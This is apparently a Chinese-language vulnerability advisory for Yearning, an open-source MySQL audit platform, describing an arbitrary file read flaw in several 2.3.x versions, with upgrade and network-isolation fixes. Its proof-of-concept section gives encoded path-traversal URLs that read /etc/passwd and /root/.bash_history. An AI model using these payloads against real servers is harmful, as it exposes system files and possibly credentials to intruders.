一、产品介绍
一款MYSQL SQL语句/查询审计开源工具,Yearning支持SQL查询、SQL审核、推送、用户权限及管理等功能,为DBA与开发人员使用,简单高效的MYSQL审计平台。
二、漏洞描述
该系统Yearning 2.3.1 版本、Interstellar GA 2.3.2 版本和 Neptune 2.3.4 -2.3.6 版本存在任意文件读取漏洞。攻击者可以利用该漏洞获取敏感信息。
三、漏洞验证
POC:
/front/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd/front/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/root/.bash_history
四、修复建议:
1、升级到最新版本,链接:https://gitee.com/cookieYe/Yearning
2、关闭互联网访问权限